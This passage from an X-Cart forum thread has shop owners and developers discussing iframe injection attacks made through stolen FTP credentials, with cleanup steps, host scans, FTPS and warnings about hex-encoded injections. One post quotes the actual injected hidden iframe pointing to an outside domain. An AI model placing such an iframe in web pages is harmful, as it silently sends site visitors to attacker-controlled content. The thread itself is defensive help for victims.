| ||||||||||
Shopping cart software Solutions for online shops and malls | ||||||||||
|
X-Cart Home | FAQ | Forum rules | Calendar | User manuals | Login |
Warning: Iframe based attacks using stolen FTP access info | ||||
|
|
Thread Tools |
#231
|
|||||||||
|
|||||||||
Re: Warning: Iframe based attacks using stolen FTP access info
We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance |
|||||||||
#232
|
|||||||
|
|||||||
Re: Warning: Iframe based attacks using stolen FTP access info
I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?
__________________
4.1.11 |
|||||||
#233
|
|||||||
|
|||||||
Re: Warning: Iframe based attacks using stolen FTP access info
Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!
I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them.. However, if you go into any page of the site (including admin pages) and click to view the source code.. the iframe link still exists <p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I've read through this entire thread and if any one have any idea what's causing this? Please let me know. Thanks for your help!
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10 |
|||||||
#234
|
|||||||
|
|||||||
Re: Warning: Iframe based attacks using stolen FTP access info
That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.
__________________
Padraic Ryan Ryan Design Studio Professional E-Commerce Development |
|||||||
|
#235
|
|||||||
|
|||||||
Re: Warning: Iframe based attacks using stolen FTP access info
Thanks for the reply. I have Hands-on doing a scan.. we'll see what the results are
Any thoughts on how to prevent another attack? Thanks
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10 |
|||||||
#236
|
|||||||||
|
|||||||||
Re: Warning: Iframe based attacks using stolen FTP access info
Also clear your browser cache and run cleanup.php - you may be looking at files complied before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold (CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module) |
|||||||||
#237
|
|||||||||
|
|||||||||
Re: Warning: Iframe based attacks using stolen FTP access info
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold (CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module) |
|||||||||
#238
|
|||||||||
|
|||||||||
Re: Warning: Iframe based attacks using stolen FTP access info
Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per say in the templates.
It could be a bunch of Hex equivalent characters. Good luck! Thanks, Carrie
__________________
Custom Development, Custom Coding and Pre-built modules for X-cart since 2002! We support X-cart versions 3.x through 5.x! Home of the famous Authorize.net DPM & CIM Modules, Reward Points Module, Point of Sale module, Speed Booster modules and more! Over 200 X-cart Mods available & Thousands of Customizations Since 2002 - bcsengineering.com Please E-Mail us for questions/support! |
|||||||||
#239
|
|||||||||
|
|||||||||
Re: Warning: Iframe based attacks using stolen FTP access info
In recent days we've been seeing the HEX add too.. instaed of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.
Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance |
|||||||||
#240
|
|||||||
|
|||||||
Re: Warning: Iframe based attacks using stolen FTP access info
Are these recent attacks still going through FTP with the correct username and password?
__________________
v4.7.12 v5.4.x (In Dev) |
|||||||
|
|||
X-Cart forums © 2001-2020
|